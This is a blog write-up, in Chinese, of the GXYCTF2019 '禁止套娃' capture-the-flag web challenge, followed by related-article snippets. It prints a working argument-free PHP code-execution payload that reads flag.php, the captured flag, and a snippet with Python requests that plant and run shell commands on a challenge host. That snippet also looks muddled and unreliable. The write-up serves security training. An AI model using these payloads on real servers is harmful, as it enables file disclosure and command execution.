[GXYCTF2019] web题-禁止套娃

最新推荐文章于 2024-03-12 11:08:36 发布
最新推荐文章于 2024-03-12 11:08:36 发布
阅读量694 收藏
点赞数
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107638782
版权

复现环境:buuoj.cn

使用GitHack下载源码index.php
在这里插入图片描述
使用
print_r(scandir(current(localeconv())));查看目录
在这里插入图片描述最终完整exp:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
在这里插入图片描述

用到的函数
print_r()
scandir()
localeconv()
current()
next()
array_reverse()
highlight_file()

flag{361b5f11-834a-416b-b410-4e986347506f}

BROTHERYY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]SXMgdGhpcyBiYXNlPw==
m0_73948163的博客
12-17 160
temp = bin((base64.find(i[-2]) & 3))[2:] # 取倒数第2个字符,在base64找到对应的索引数(就是编码数),取低2位,再转换为二进制字符。binstr = binstr + "0" * (4 - len(temp)) + temp # 二进制字符补高位0后,连接字符到binstr。binstr = binstr + "0" * (2 - len(temp)) + temp # 二进制字符补高位0后,连接字符到binstr。放到paycharm里面运行。
BUUCTF-MISC-[GXYCTF2019]SXMgdGhpcyBiYXNlPw==~zip
七堇年的博客
12-25 3122
BUUCTF-MISC-[GXYCTF2019]SXMgdGhpcyBiYXNlPw==~zip
base64隐写
doudoudedi
11-01 443
import sys def get_base64_diff_value(s1, s2): base64chars = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/’ res = 0 for i in xrange(len(s1)): if s1[i] != s2[i]: return abs(base64chars.index(s1[i]) - base64chars.index(s2[i])) return res d
[GXYCTF 2019]SXMgdGhpcyBiYXNlPw== WriteUp by MiguoQAQ
2301_76328911的博客
03-12 375
base64脚本
[GXYCTF2019]禁止套娃(特详解)
热门推荐
qq_74806534的博客
01-29 2万+
loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来。localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。一个合法的表达式也可以是a(b();
命令注入总结
weixin_44576725的博客
12-15 6409
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
众星捧月-俄罗斯套娃游戏开发
06-19
将Cross.txt文本中的的所代表的套娃重量的矩阵数据读入到Boy类的的成员weight二维数组中。 第二步:定义了向上走、向下走、向左走、向右走四个方向函数:Up()、Down()、Left()、Right(),每个函数都有一个...
2010 “中兴捧月”校园程序设计大赛---俄罗斯套娃源码
05-21
本人写的一个关于俄罗斯套娃的源程序,其目的是抛砖引玉,欢迎大家分享优质、高效的代码。 经过本人强力测试,可以处理重量为0的娃娃。其实这也是这个程序比较难的地方。娃娃的重量为0,就表示该路口没有套娃可以...
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
11-12
中的“医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法”揭示了这个文件内容的核心,它涉及到的是一个与医学相关的科研成果,具体是关于一种特殊的锰氧化合物纳米晶复合粒子的结构设计和制造工艺。在医学领域...
Scratch图形化编程套娃生产机 根据输入的套娃层数,自动生产出套娃产品
最新发布
05-27
Scratch图形化编程套娃生产机。 根据输入的套娃层数,自动生产出套娃产品。
Imaginary CTF 2022 真
08-01
3. **Web安全(Web)**:Web安全挑战通常涉及到网站的漏洞挖掘和利用。参赛者需要熟悉HTTP协议、Web应用程序架构以及常见的漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞等。挑战可能要求参赛者找到并利用网站的...
[GXYCTF2019]禁止套娃
weixin_45751765的博客
11-25 381
0x00 前言 写这篇主要巩固一下正则,难度不是特别大 递归正则属于是盲区了 0x01 Sunwear 看看页面空空如也,抓包看看也是空空如也 果断扫一下 Githack一把梭 拿到index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET
BUUCTF:[GXYCTF2019]禁止套娃
末初的CSDN博客
12-08 1491
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83 .git泄露,使用GitHack index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i',
无参数函数RCE
weixin_53146913的博客
07-19 1712
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取
[GXYCTF2019]禁止套娃 WP
Yang_99的博客
08-06 401
1.第一步是.git文件泄露 用GitHack.py跑一下得到源码index.php 2.读源码 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]
BUUCTF-WEB-[GXYCTF2019]禁止套娃
r1727337824的博客
08-29 435
.git源码泄露+代码审计 转载大佬的WP https://blog.csdn.net/weixin_43952190/article/details/107061554 1.打开网址只显示了flag在哪,查看源代码无任何有用信息 2.用御剑也没搜索到后台目录 3.这时候考虑源码泄露 打开网址 http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git 出现403错误 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。
常见的绕过姿势(续)
qq_60518252的博客
01-25 1394
8.扫描目录: print_r扫描⽬录 c=print_r(scandir('.'));#查看当前目录 c=print_r(scandir('/'));#查看根目录 c=print_r(glob('*'));#查看当前目录 c=print_r(glob('/*'));#查看根目录 var_dump扫描⽬录 c=var_dump(scandir('.'));#查看当前目录 c=var_dump(scandir('/'));#查看根目录 c=var_dump(glob('*'));#查看当
无参数读文件和RCE总结
蚁景网安学院
07-06 2725
引言代码解析无参数任意文件读取查看当前目录文件名读取当前目录文件查看上一级目录文件名读取上级目录文件查看和读取多层上级路径的就不写了,一样的方式套娃就行查看和读取根目录文件无参数命令执行...
无参数文件读取
cosmoslin的博客
09-14 261
无参数文件读取 什么是无参数? 顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等。 举个例子: a(b(c()));可以使用,但是a(‘b’)或者a(‘b’,‘c’)这种含有参数的都不能使用 所以我们要使用无参数的函数进行文件读取或者命令执行。 首先,print_r(scandir(’.’))可以用于可以用来查看当前目录所有文件名。那么要做到无参数,就要构造替代 ‘.’ 。 常见方法: locale
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套娃shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套娃shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套娃shell来执行命令并获取所需的结果了。请注意,使用套娃shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值